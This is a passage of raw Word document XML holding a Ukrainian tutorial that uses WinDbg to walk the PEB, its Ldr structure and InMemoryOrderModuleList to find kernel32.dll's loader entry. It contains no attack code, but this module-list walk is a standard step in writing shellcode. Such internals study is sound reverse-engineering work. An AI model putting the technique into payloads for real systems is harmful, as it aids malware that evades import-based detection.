          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>роцес</w:t>
      </w:r>
      <w:r w:rsidR="004E67AD">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C3B24E" w14:textId="36EA05E6" w:rsidR="00067DB3" w:rsidRPr="00067DB3" w:rsidRDefault="00DA12FB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C257E">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dx -r1 ((ntdll!_PEB *)0xd3dc2b7000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC299C" w14:textId="1F2B3CAE" w:rsidR="00F25D0D" w:rsidRDefault="005C29B1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4914EA69" wp14:editId="5C7C147F">
            <wp:extent cx="6645910" cy="993775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="673690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90132" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId8"/>
                    <a:srcRect t="52819"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="99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0B7F7" w14:textId="7EBE538C" w:rsidR="00E41888" w:rsidRPr="00E41888" w:rsidRDefault="00C42883" w:rsidP="00067DB3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00E816A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dr</w:t>
      </w:r>
      <w:r w:rsidR="00067DB3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> знаходиться за офсетом </w:t>
      </w:r>
      <w:r w:rsidR="00067DB3" w:rsidRPr="00CA48DE">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00067DB3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00CA48DE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidR="00067DB3" w:rsidRPr="00CA48DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00067DB3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">від початку </w:t>
      </w:r>
      <w:r w:rsidR="00CA48DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00067DB3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidR="00067DB3" w:rsidRPr="00CA48DE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDC188" w14:textId="6BD64822" w:rsidR="00F25D0D" w:rsidRPr="00F63DA8" w:rsidRDefault="006C0434">
      <w:r w:rsidRPr="006C0434">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4. </w:t>
      </w:r>
      <w:r w:rsidR="00CB4C97">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Тепер поглянемо на </w:t>
      </w:r>
      <w:r w:rsidR="00F63DA8">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">структуру </w:t>
      </w:r>
      <w:r w:rsidR="00F63DA8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ldr</w:t>
      </w:r>
      <w:r w:rsidR="00F63DA8" w:rsidRPr="00F63DA8">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB77D5E" w14:textId="5A0D7303" w:rsidR="002D06FC" w:rsidRPr="00E531BB" w:rsidRDefault="0051114F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 ((</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!_</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> *)0</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffc</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fa</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00956246">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17C7D2" w14:textId="326F4542" w:rsidR="0051114F" w:rsidRDefault="000E4A48">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71C0C3F3" wp14:editId="63DBF693">
            <wp:extent cx="6645910" cy="1656080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="130847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72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04CD" w14:textId="35A540F8" w:rsidR="00976E71" w:rsidRPr="00562366" w:rsidRDefault="00976E71">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidR="008D630C" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="008D630C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="008D630C" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="008D630C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> знаходиться </w:t>
      </w:r>
      <w:r w:rsidR="00562366">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">список </w:t>
      </w:r>
      <w:r w:rsidR="00562366" w:rsidRPr="00CD0A3B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>InMemoryOrderModuleList</w:t>
      </w:r>
      <w:r w:rsidR="00562366">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>кож</w:t>
      </w:r>
      <w:r w:rsidR="003B7D9F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ний</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>елемент</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>якого</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>це</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>адреса</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277">
        <w:t>структур</w:t>
      </w:r>
      <w:r w:rsidR="00ED406B">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00ED406B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B0277" w:rsidRPr="00BE3141">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>LDR_DATA_TABLE_ENTRY</w:t>
      </w:r>
      <w:r w:rsidR="00220D0C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A4EC8B" w14:textId="77777777" w:rsidR="002D06FC" w:rsidRDefault="002D06FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3657BE90" w14:textId="422F9BD9" w:rsidR="004A6B40" w:rsidRDefault="00823B6D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823B6D">
        <w:t>1.5.</w:t>
      </w:r>
      <w:r w:rsidR="00136864">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00546E5E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Поглянемо на елементи цього списку. </w:t>
      </w:r>
      <w:r w:rsidR="004A6B40">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Кожний елемент має </w:t>
      </w:r>
      <w:r w:rsidR="003A72A4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004A6B40">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> поля:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46693578" w14:textId="4F713DDB" w:rsidR="004A6B40" w:rsidRDefault="00546E5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flink</w:t>
      </w:r>
      <w:r w:rsidRPr="00B0768F">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">вказівник </w:t>
      </w:r>
      <w:r w:rsidR="00B0768F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на наступний елемент</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6195D" w14:textId="465EE794" w:rsidR="006F6F7E" w:rsidRPr="006F6F7E" w:rsidRDefault="00B0768F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blink</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>вказівник на попередній</w:t>
      </w:r>
      <w:r w:rsidR="006F6F7E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> елемент</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A986850" w14:textId="5A852A72" w:rsidR="00EC2892" w:rsidRPr="00E531BB" w:rsidRDefault="00EC2892">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dx</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1 (*((</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ntdll</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>!_</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LIST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ENTRY</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> *)0</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffc</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fa</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="0007449A">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076837A3" w14:textId="6C77A6DA" w:rsidR="00861DB1" w:rsidRPr="00861DB1" w:rsidRDefault="0071792D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4548E970" wp14:editId="2FF0B279">
            <wp:extent cx="6645910" cy="899795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="122270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035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0F4" w14:textId="77777777" w:rsidR="0028227F" w:rsidRDefault="0028227F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61527907" w14:textId="264F6B8F" w:rsidR="00016482" w:rsidRDefault="00206323">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00AE62B0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00016482">
        <w:t>Прокл</w:t>
      </w:r>
      <w:r w:rsidR="00016482">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ікаємо </w:t>
      </w:r>
      <w:r w:rsidR="00BF57D2">
        <w:t>дв</w:t>
      </w:r>
      <w:r w:rsidR="00BF57D2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ічі</w:t>
      </w:r>
      <w:r w:rsidR="00016482">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000554EE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">по </w:t>
      </w:r>
      <w:r w:rsidR="000554EE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flink</w:t>
      </w:r>
      <w:r w:rsidR="00F06163">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C39AE" w14:textId="3866846C" w:rsidR="00F06163" w:rsidRPr="00A0727D" w:rsidRDefault="007E65BD">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0727D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>dx -r1 ((ntdll!_LIST_ENTRY *)0x1ee03484040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431ED987" w14:textId="1509D905" w:rsidR="007E65BD" w:rsidRPr="00A0727D" w:rsidRDefault="007E65BD">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0727D">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>dx -r1 ((ntdll!_LIST_ENTRY *)0x1ee03483e70)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE6961" w14:textId="2BEA2999" w:rsidR="00D938CC" w:rsidRDefault="00DA78B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="514A9E42" wp14:editId="3296F427">
            <wp:extent cx="6645910" cy="1924685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="325932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32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EED8" w14:textId="22546CB8" w:rsidR="00AC7218" w:rsidRPr="004913C3" w:rsidRDefault="000047C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отримаємо такий ланцюжок</w:t>
      </w:r>
      <w:r w:rsidR="0074733D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A2A3F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC7218">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Ці адреси </w:t>
      </w:r>
      <w:r w:rsidR="00BD25A5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>впорядковані</w:t>
      </w:r>
      <w:r w:rsidR="00EB45D6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – адреса </w:t>
      </w:r>
      <w:r w:rsidR="00ED406B" w:rsidRPr="00476C89">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>структур</w:t>
      </w:r>
      <w:r w:rsidR="003A743B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00ED406B" w:rsidRPr="00BE3141">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>LDR_DATA_TABLE_ENTRY</w:t>
      </w:r>
      <w:r w:rsidR="00DF3074">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, що описує</w:t>
      </w:r>
      <w:r w:rsidR="004913C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004913C3" w:rsidRPr="00BD5A6F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidR="004913C3" w:rsidRPr="00BD5A6F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="004913C3" w:rsidRPr="00BD5A6F">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="00DF3074">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004913C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">буде третьою (як в </w:t>
      </w:r>
      <w:r w:rsidR="009E6C73" w:rsidRPr="00EF5D6B">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>!peb</w:t>
      </w:r>
      <w:r w:rsidR="004913C3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00833BB2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4030FD3E" w14:textId="77777777" w:rsidR="006B73C5" w:rsidRDefault="006B73C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EA38377" w14:textId="520AD3A7" w:rsidR="00450FB3" w:rsidRPr="00450FB3" w:rsidRDefault="005F6FD0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.7.</w:t>
      </w:r>
      <w:r w:rsidR="0063232A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00450FB3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Дослідимо </w:t>
      </w:r>
      <w:r w:rsidR="00AB33DE" w:rsidRPr="00BE3141">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
